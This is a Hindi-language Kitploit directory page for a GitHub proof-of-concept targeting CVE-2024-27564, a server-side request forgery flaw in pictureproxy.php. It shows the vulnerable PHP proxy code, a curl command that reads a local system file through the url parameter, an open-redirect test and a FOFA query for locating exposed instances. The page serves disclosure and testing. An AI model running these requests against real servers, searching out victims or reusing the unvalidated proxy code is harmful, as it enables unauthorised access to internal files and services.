Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SSRF-Exploit-CVE-2024-27564 — प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2024-27564 के लिए, जो pictureproxy.php में बिना सत्यापन के URL पैरामीटर के माध्यम से SSRF का प्रदर्शन करता है। इसमें curl-आधारित परीक्षण और कमजोर इंस्टेंस के लिए FOFA खोज शामिल है। | Kitploit
उपकरण/GitHubGitHub/chaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubchaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564

SSRF-Exploit-CVE-2024-27564

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2024-27564 के लिए, जो pictureproxy.php में बिना सत्यापन के URL पैरामीटर के माध्यम से SSRF का प्रदर्शन करता है। इसमें curl-आधारित परीक्षण और कमजोर इंस्टेंस के लिए FOFA खोज शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1492 साल पहलेअभी तक समीक्षित नहीं

SSRF-शोषण-CVE-2024-27564

परियोजना शीर्षक

यह परियोजना pictureproxy.php फ़ाइल में सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) कमज़ोरी को प्रदर्शित करती है।

विवरण

pictureproxy.php में एक कमज़ोरी दूरस्थ हमलावरों को url पैरामीटर में URL इंजेक्ट करके मनमाने अनुरोध करने की अनुमति देती है। इस SSRF कमज़ोरी का बिना प्रमाणीकरण के शोषण किया जा सकता है, जो इसे विशेष रूप से खतरनाक बनाता है।

कमज़ोर कोड pictureproxy.php फ़ाइल में है। समस्या इसलिए होती है क्योंकि फ़ंक्शन url पैरामीटर को ठीक से मान्य नहीं करता। $_GET['url'] वेरिएबल को file_get_contents() फ़ंक्शन में पास किया जाता है, जो निर्दिष्ट URL से सामग्री लाता है। इससे SSRF हो सकता है।

प्रमाण की अवधारणा

यहाँ एक सरल प्रमाण की अवधारणा है जो दिखाती है कि कमज़ोरी का शोषण कैसे किया जा सकता है:

<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

कमज़ोरी का परीक्षण करने के लिए, आप निम्नलिखित curl कमांड का उपयोग कर सकते हैं:

curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

ओपन रीडायरेक्ट के साथ परीक्षण किया गया

एक ओपन रीडायरेक्ट कमज़ोरी का उपयोग करके परीक्षण:

https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg

बैनर

उपकरण

  • FOFA: इंटरनेट उपकरणों और कमज़ोरियों के लिए एक खोज इंजन। प्रासंगिक परिणाम खोजने के लिए निम्नलिखित कमांड का उपयोग करें:
"title="ChatGPT个人专用版""

निष्कर्ष

यह परियोजना SSRF कमज़ोरियों से बचने के लिए उपयोगकर्ता इनपुट को ठीक से मान्य करने के महत्व को उजागर करती है। हमेशा सुनिश्चित करें कि URL जैसे पैरामीटर को संसाधित करने से पहले पूरी तरह से जांचा जाए।

टूल डाउनलोड करें